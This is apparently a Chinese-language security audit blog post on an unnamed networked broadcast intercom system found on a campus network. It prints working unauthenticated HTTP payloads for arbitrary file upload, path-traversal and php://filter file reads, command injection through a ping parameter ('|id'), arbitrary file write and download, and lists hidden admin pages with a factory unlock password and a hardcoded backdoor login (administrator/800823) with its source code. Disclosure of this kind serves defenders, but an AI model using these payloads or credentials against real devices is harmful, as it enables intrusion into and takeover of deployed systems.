某网络广播对讲设备审计

Delina

原文链接：某网络广播对讲设备审计
​
0x00 前言
在校内网中碰见这套网络对讲设备系统，遂对其进行稍微细致的审计，通过已知漏洞扒拉下来源码.
0x01 前台任意文件上传
上传点1定位到几处文件上传操作：/upload/my_parser.php

​

Payload:[生成的文件:/upload/files/info.php]

1. POST /upload/my_parser.php HTTP/1.1
   
2. Host: x.x.x.x
   
3. Connection: keep-alive
   
4. Content-Length: 216
   
5. Pragma: no-cache
   
6. Cache-Control: no-cache
   
7. Upgrade-Insecure-Requests: 1
   
8. Origin: http://x.x.x.x
   
9. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTj3WLQhN3ZSs0CAg
   
10. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    
11. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    
12. Referer: http://x.x.x.x/upload/my_parser.php
    
13. Accept-Encoding: gzip, deflate
    
14. Accept-Language: zh-CN,zh;q=0.9
    
15. 
    
16. ------WebKitFormBoundaryAgwuKUMd2jB55NEm
    
17. Content-Disposition: form-data; name="upload"; filename="info.php"
    
18. Content-Type: application/octet-stream
    
19. 
    
20. <?php phpinfo();?>
    
21. ------WebKitFormBoundaryAgwuKUMd2jB55NEm--

复制代码

​

上传点2/php/addscenedata.php

​

Payload:[生成的文件:/images/scene/info.php]

1. POST /php/addscenedata.php HTTP/1.1
   
2. Host: x.x.x.x
   
3. Connection: keep-alive
   
4. Content-Length: 216
   
5. Pragma: no-cache
   
6. Cache-Control: no-cache
   
7. Upgrade-Insecure-Requests: 1
   
8. Origin: http://x.x.x.x
   
9. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRdOoAbqBRCt5Bgzj
   
10. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    
11. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    
12. Referer: http://x.x.x.x/php/addscenedata.php
    
13. Accept-Encoding: gzip, deflate
    
14. Accept-Language: zh-CN,zh;q=0.9
    
15. 
    
16. ------WebKitFormBoundaryAgwuKUMd2jB55NEm
    
17. Content-Disposition: form-data; name="upload"; filename="info.php"
    
18. Content-Type: application/octet-stream
    
19. 
    
20. <?php phpinfo();?>
    
21. ------WebKitFormBoundaryAgwuKUMd2jB55NEm--

复制代码

​

嫌麻烦的话可以直接访问/upload/upload.html上传 (/upload/files/info.php)

​

0x02 前台任意文件读取
读取点1​​
定位到一处文件读取操作. /php/getjson.php

​

Payload:

1. POST /php/getjson.php HTTP/1.1
   
2. Host: x.x.x.x
   
3. Connection: keep-alive
   
4. Content-Length: 42
   
5. Pragma: no-cache
   
6. Cache-Control: no-cache
   
7. Upgrade-Insecure-Requests: 1
   
8. Origin: http://x.x.x.x
   
9. Content-Type: application/x-www-form-urlencoded
   
10. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    
11. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    
12. Referer: http://x.x.x.x/php/getjson.php
    
13. Accept-Encoding: gzip, deflate
    
14. Accept-Language: zh-CN,zh;q=0.9
    
15. 
    
16. jsondata[filename]=../php/test.php

复制代码

​

读取点2/php/rj_get_token.php
​
Payload:

1. POST /php/rj_get_token.php HTTP/1.1
   
2. jsondata[url]=test.php

复制代码

​
用php伪协议读取文件:

1. POST /php/rj_get_token.php HTTP/1.1
   
2. jsondata[url]=php://filter/read=convert.base64-encode/resource=backup.php

复制代码

​

0x03 前台任意命令执行
定位到一处命令执行.

​

​

Payload:

1. POST /php/ping.php HTTP/1.1
   
2. jsondata[type]=0&jsondata[ip]=|id

复制代码

​

0x04 前台任意文件写入
​​
定位到一处file_put_contents /php/uploadjson.php

​

​

Payload:

1. POST /php/uploadjson.php HTTP/1.1
   
2. jsondata[filename]=../ppp.php&jsondata[data]=123

复制代码

​

0x05 前台任意文件下载
定位到三处文件读取操作 十分可疑.

​

​

GET传入downname即可下载任意文件.Payload: /php/exportrecord.php?downname=test.php

​

0x06 未授权访问
通读源码时发现，这套系统里还包含一些有趣的东西.
智慧xx，访问/prison/index.html进入

​

系统维护访问/html/system.html进入

​

厂家维护，访问/html/factory.html进入解锁密码:Rdc070#

​

0x07 后门账户
在/js/index.js|/php/login.php中放置了后门账户，可导致恶意登录
administrator 800823
​​

1. <?php
   
2.     require_once ('conversion.php');
   
3. 
   
4.     $postData = $_POST['jsondata'];
   
5.     $arr['res'] = 0;
   
6. 
   
7.     if (isset($postData['username'])) {
   
8.         $user = $postData['username'];
   
9.         $pass = $postData['password'];
   
10. 
    
11.         if ('800823' == $pass && 'administrator' == $user)
    
12.         {
    
13.             $arr['username'] = 'administrator';
    
14.             $arr['password'] = '800823';
    
15.             $arr['display'] = 'administrator';
    
16.             $arr['modules'] = '1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1';
    
17.             $arr['rights'] = '*';
    
18.             $arr['serverrights'] = '*';
    
19.             $arr['isadmin'] = '1';
    
20.             $arr['bindterminals'] = '';
    
21.             $arr['res'] = 1;
    
22.             $arr['mainurl'] = 'main';
    
23.             $arr['token'] = 'SESSION';
    
24.             echo JSON($arr);
    
25.         }
    
26.         else
    
27.         {
    
28.             $result = UdpSendAndRecvJson($postData, "login");
    
29.             echo $result;
    
30.         }
    
31.     }
    
32. ?>

复制代码

1. var passwd = $('#tbpass').val();
   
2. var isencrypted = "0";
   
3. if (user == "administrator" && passwd == "800823") {
   
4.     isencrypted = "0";
   
5.   } else {
   
6.     var b = new SPON_Base64("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=");   //标准base64
   
7.     passwd = b.encode(passwd).split("").reverse().join(""); //反转
   
8.     isencrypted = "1";
   
9. }

复制代码

0x08 总结这套系统大部分文件均未授权,无需登录后台,可利用接口进行任意操纵。

​

​